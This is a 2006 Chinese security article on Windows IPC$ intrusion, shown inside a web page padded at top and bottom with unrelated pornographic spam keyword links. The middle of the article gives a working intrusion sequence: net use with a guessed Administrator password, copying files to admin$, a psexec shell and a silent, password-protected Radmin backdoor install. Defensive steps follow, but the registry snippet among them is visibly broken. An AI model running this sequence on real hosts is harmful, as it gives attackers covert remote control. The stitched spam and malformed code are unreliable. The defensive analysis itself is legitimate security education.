国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關注微信公眾號

IPC安全防范研究
2006-01-10   網絡

  網絡安全遵循木桶原理,即整個網絡環境中網絡安全的水平是由該網絡中防護水平最弱的計算機所決定的。在單位內部網絡中,大部分安全都是建立在基于“信任”的基礎上,而沒有采取安全防范方法,認為沒有誰會進行破壞,沒有誰會獲取情報信息。在這種環境下,遠程網絡連接安全是一個不容忽視的安全問題,值得進行探討。

什么是IPC
  IPC是Internet Process Connection的縮寫,也就是遠程網絡連接。它是Windows NT及Windows 2000特有的一項功能。IPC是Windows的一個重要模塊,網上鄰居以及網絡共享都是通過IPC來實現的。黑客或者入侵者利用IPC$共享來實現入侵。網絡上也常常將利用IPC$來實現入侵,稱為IPC$漏洞。IPC$連接分為IPC$空連接和帶有一定權限IPC$連接,IPC$空連接沒有任何權限,但是可以獲取該主機的netbios信息;而帶有權限的IPC$連接則可以執行命令和對文件進行復制、刪除和修改等操作,從安全的角度來說,IPC$是一個存在安全隱患的因素。

IPC$入侵原理
  IPC$入侵的最主要原理就是獲取被入侵主機的密碼,利用有權限的IPC$連接到主機并復制文件到主機上,然后運行木馬程序或者執行命令來實現完全控制。如果系統默認共享全部打開,通過字典軟件生成用戶口令密碼,再利用某些軟件進行用戶登錄密碼的暴力猜解,獲取用戶密碼只是時間問題。因此網絡遠程連接(IPC)安全是網絡安全中一個不容忽視的問題。

常見IPC漏洞攻擊方法
  1.利用IPC漏洞應具備的條件

  (1)知道賬號和口令,且賬號的權限必須是System以上,本系統中使用是Administator權限。在絕大多數環境中,利用軟件所掃描出來的弱口令一般都是管理員(Administrator)權限,如圖1所示。

  (2)系統沒有禁用遠程IPC$連接
  (3)能夠掃描到對方計算機上所開放的445、135或者139端口
  2.試驗
  (1)試驗環境
  ◆ Windows 2000 Professional +SP4虛擬機
  ◆ 系統未安裝殺毒軟件和防火墻
  ◆ 目標機IP地址為192.168.1.4
  ◆ 遠程控制文件R_server.exe、raddrv.dll、AdmDll.dll。除了Radmin以外還有其他的遠程控制軟件也可以使用。
  (2)探測目標機開放端口
  ◆ 使用sfind工具。使用命令格式為sfind -p 192.168.1.4
  ◆ 使用NT自動攻擊工具
  (3)獲取目標機管理員賬號和密碼
  (4)執行命令
net use \192.168.1.4ipc$ "123456" /user:"Administrator"
copy *.*
\192.168.1. 4admin$ 其中*.*包含所有的控制文件。
psexec
\192.168.1.4 cmd
  通過命令行方式安裝R_Server。直接在psexec中執行以下命令:
netstat -an |find "4899"
regsrc.exe/pass:lovemeloveyou/port:4899/save/silence
regsrc.exe /install /silence
net start r_server
netstat -an |find "4899"
  執行結果表示Radmin遠程控制軟件服務端安裝成功,然后通過radmin客戶端可以直接對該計算機實施遠程控制。

安全防范方法
  1.管理層次防范方法
  在網絡管理中常流行一句話“三分技術,七分管理”。其實在網絡安全中也是“三分技術,七分管理”,安全重在管理。只有意識上的重視才能帶來長久的安全。
  (1)安全審計
  密碼的安全是整個網絡安全中的一個重要因素,因此應從審計的角度加強管理,可以對系統是否安裝殺毒軟件、防火墻軟件、安裝系統補丁、系統設置密碼等方面進行安全審計,并配置一個安全管理人員。
  (2)安全知識培訓
  網絡安全也是一門技術,它由很多知識構成。因此了解和實施需要一個過程,這個過程就是培訓和教育。通過培訓來提高安全意識和安全技能,通過知識和法律教育來普及計算安全知識和計算機犯罪方面的法律意識和責任,增強安全感和責任感。
  2.技術層次防范方法
  (1)查看網絡連接情況
  使用“netstat -an”查看本機與網絡的連接情況。該命令可以查看目前所建立的連接,系統所開放的服務端口。
  (2)查看IPC$連接情況
  使用“net use”命令查看網絡共享連接情況,如果顯示結果是“清單是空的”則表示無IPC$連接。否則會顯示連接的的詳細信息。
  (3)安裝防火墻軟件
  (4)關閉掉缺省共享
  關閉缺省共享有兩種方式,一種是徹底的禁用共享,一種是開機后刪除共享。
  開機后刪除共享,可以將如下代碼復制到記事本,然后將其另存為delshare.bat文件,并將其添加到系統的啟動中,這樣系統啟動后就會自動刪除默認共享。
net share admin$ /del
net share ipc$ /del
net share c /del
net share d /del
net share e /del
  徹底刪除共享,可以直接將以下代碼復制到文本文件,并保存為delshare.reg文件,然后自己雙擊該文件將其導入注冊表即可。
REGEDIT4
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServices lanmanserverparameters]
"AutoShareServer"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesTcpip Parameters]
"DefaultTTL"= 0-0xff
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetServicesl anmanserverparameters]
"AutoshareWks"=dword:00000000
[HKEY_LOCAL_MACHINESYSTEM CurrentControlSetControlLsa]
  (5)禁止Schedule服務
  直接在“開始”-“運行”中輸入“services.msc”,在服務控制面板中停止掉
本文通過對IPC$入侵方法的分析和研究,提出了技術層次和管理層次的防范。通過以上的分析,可以看出IPC的安全是一個不容忽視的安全問題,因此進行網絡遠程連接的安全防范是非常必須的。

熱詞搜索:

上一篇:L-Blog的三個漏洞
下一篇:Squid安全策略

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
精品盗摄一区二区三区| 91在线免费播放| 在线观看亚洲a| 一区二区三区精品在线| 色国产综合视频| 午夜私人影院久久久久| 日韩欧美三级在线| 岛国精品一区二区| 亚洲二区在线视频| 欧美xxxxx牲另类人与| 国产高清亚洲一区| 亚洲在线一区二区三区| 日韩三区在线观看| 99精品久久久久久| 另类小说一区二区三区| 国产精品久久久久婷婷| 7777精品伊人久久久大香线蕉最新版| 九九精品视频在线看| 一区二区三区四区av| 欧美一区二区播放| 91美女在线视频| 精品一区二区成人精品| 亚洲另类中文字| 精品久久五月天| 色婷婷一区二区| 国产乱码字幕精品高清av| 亚洲国产乱码最新视频| 久久久亚洲精品一区二区三区| 91国偷自产一区二区开放时间| 精品一区二区影视| 亚洲国产综合色| 国产精品久久久久久久久快鸭| 日韩欧美国产综合一区| 欧美视频精品在线| 99久久精品国产一区| 国产在线看一区| 日韩av电影一区| 调教+趴+乳夹+国产+精品| 亚洲人成网站影音先锋播放| 久久女同性恋中文字幕| 在线播放91灌醉迷j高跟美女| 91香蕉视频mp4| 成人午夜在线播放| 国产高清精品久久久久| 久久机这里只有精品| 日日噜噜夜夜狠狠视频欧美人| 亚洲欧美日韩国产另类专区| 国产精品免费视频观看| 欧美国产综合色视频| 久久久久久免费毛片精品| 欧美成人vr18sexvr| 91麻豆精品国产91久久久使用方法 | 7777精品伊人久久久大香线蕉经典版下载| 成人综合激情网| 成人高清免费在线播放| 国产91对白在线观看九色| 国产成人av自拍| 成人h动漫精品一区二区 | 国产精品羞羞答答xxdd| 久久精品久久精品| 精品一区二区免费视频| 国产一区三区三区| 国产精品538一区二区在线| 久久99热国产| 福利视频网站一区二区三区| 高清beeg欧美| 99精品热视频| 欧美日韩精品一区二区天天拍小说| 欧美美女直播网站| 欧美一区二区日韩| 久久午夜国产精品| 日韩毛片高清在线播放| 亚洲不卡av一区二区三区| 日韩电影一区二区三区| 国产精品1区2区| 97se亚洲国产综合自在线| 欧美午夜一区二区| 日韩欧美一级精品久久| 欧美国产精品v| 亚洲第一电影网| 国产精品一区二区在线观看网站| 成人黄色电影在线 | 在线观看国产精品网站| 欧美一区二视频| 国产女人18水真多18精品一级做| 成人欧美一区二区三区1314| 亚洲chinese男男1069| 韩国在线一区二区| 色婷婷av一区二区三区大白胸| 欧美色综合网站| 国产精品毛片无遮挡高清| 亚洲福利电影网| av不卡在线观看| 69堂精品视频| 中文字幕字幕中文在线中不卡视频| 日韩国产欧美在线播放| 99久久精品国产麻豆演员表| 日韩视频在线观看一区二区| 国产精品第一页第二页第三页| 午夜精品视频一区| av午夜精品一区二区三区| 欧美一区二区三区思思人| 综合久久给合久久狠狠狠97色 | 91亚洲男人天堂| 欧美大片顶级少妇| 亚洲已满18点击进入久久| 精品中文av资源站在线观看| 欧美日韩情趣电影| 国产精品成人在线观看| 国产91富婆露脸刺激对白| 日韩视频123| 水野朝阳av一区二区三区| bt欧美亚洲午夜电影天堂| 精品国产免费视频| 日本伊人色综合网| 91极品美女在线| 亚洲欧美日韩在线不卡| 国产成人精品www牛牛影视| 精品日本一线二线三线不卡| 首页综合国产亚洲丝袜| 在线亚洲免费视频| 日韩美女精品在线| 99在线视频精品| 国产精品乱码久久久久久| 国产一区二区美女诱惑| 精品久久一区二区| 国产精品亚洲第一区在线暖暖韩国 | 久久综合久久鬼色中文字| 精品综合免费视频观看| 日韩亚洲欧美高清| 免费看欧美美女黄的网站| 欧美日韩精品三区| 亚洲成人av电影在线| 欧美日韩在线三级| 日本伊人精品一区二区三区观看方式| 91激情在线视频| 日韩中文字幕av电影| 91精品国产麻豆国产自产在线| 日韩电影在线观看一区| 欧美大胆人体bbbb| 国产一区不卡视频| 久久蜜桃av一区精品变态类天堂| 国产成人在线色| 亚洲欧洲日本在线| 精品视频一区二区不卡| 视频一区在线视频| 精品国产网站在线观看| 成人永久免费视频| 一区二区三区国产精华| 日韩欧美高清在线| 国产成人三级在线观看| 最新国产成人在线观看| 欧美系列一区二区| 韩国三级在线一区| 国产精品免费网站在线观看| 色婷婷久久一区二区三区麻豆| 一区二区三区四区不卡在线| 日韩欧美的一区二区| 国产一区二区伦理片| 一区二区三区波多野结衣在线观看| 欧美丰满美乳xxx高潮www| 久久精品国产99国产| 国产精品视频一二三区 | 亚洲精品一二三| 日韩亚洲欧美在线| www.欧美色图| 日韩精品欧美精品| 久久久久久久一区| 欧美亚洲尤物久久| 国产精品影音先锋| 亚洲高清中文字幕| 亚洲国产成人在线| 日韩三级av在线播放| 成人开心网精品视频| 日本一区中文字幕 | 91精品福利在线| 激情都市一区二区| 亚洲一区二三区| 中文字幕久久午夜不卡| 欧美精品欧美精品系列| 高清shemale亚洲人妖| 日韩**一区毛片| 亚洲女与黑人做爰| 久久久久久久性| 亚洲精品一区二区三区99| 欧美色偷偷大香| 91免费在线视频观看| 国产麻豆精品在线| 日韩av在线免费观看不卡| 亚洲自拍欧美精品| 亚洲欧洲三级电影| 国产欧美精品在线观看| 亚洲精品在线观| 日韩欧美不卡在线观看视频| 欧美最猛黑人xxxxx猛交| 91蝌蚪porny| 一本久久综合亚洲鲁鲁五月天| 不卡一卡二卡三乱码免费网站| 久久爱另类一区二区小说| 免费一级片91|